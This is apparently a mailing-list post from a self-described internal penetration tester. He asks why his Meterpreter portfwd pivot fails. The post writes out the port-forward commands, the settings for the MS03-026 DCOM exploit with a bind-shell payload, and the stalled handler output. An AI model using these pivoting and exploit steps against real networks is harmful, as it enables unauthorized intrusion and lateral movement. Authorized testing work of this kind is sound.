use of meterpreter

[thomas.werth at vahle.de (Thomas Werth)]

hello,

i need some info on how to use meterpreter so victim host can be used as
 "proxy". I read already meterpreter PDF Documentation.
I'm doing a pen-test in own company intranet and have to find out "what
is possible" . I wanna use a victim host as proxy for further attacks in
intranet.

So here's what im doing :
1. Exploitet "proxy victim" with metasploit's meterpreter payload.
2. In meterpreter "shell" i'm adding some portfwd's like this :
- portfwd -a -l 9500 -h 'nextTargetIP' -p 135
- portfwd -a -l 4444 -h 'nextTargetIP' -p 4444 -P //-P is just another
test in hope it will work this time ...
3. now i'm using msrpc exploit with win32_bind payload
Setting Options to

msf msrpc_dcom_ms03_026(win32_bind) > show options

Exploit and Payload Options
===========================

  Exploit:    Name      Default        Description
  --------    ------    -----------    ------------------
  required    RHOST     'ProxyHost'    The target address
  required    RPORT     9500           The target port

  Payload:    Name        Default    Description
  --------    --------    -------
------------------------------------------
  required    EXITFUNC    thread     Exit technique: "process",
"thread", "seh"
  required    LPORT       4444       Listening port for bind shell

  Target: Windows NT SP6/2K/XP/2K3 ALL

4. now launching exploit

msf msrpc_dcom_ms03_026(win32_bind) > exploit

5. that's where it hangs :

[*] Starting Bind Handler.
[*] Got connection from 'HOST_I_USE_FOR_ATTACK':32773 <-> 'PROXY_HOST':4444

6. Waited long enough, killed connetion with strg-C

Caught interrupt, exit connection? [y/n] y
[*] Exiting Bind Handler.

What am i doing wrong, or isn't it possible to use portfwd so attacks
can be redirected through a proxy ?

greets
Thomas Werth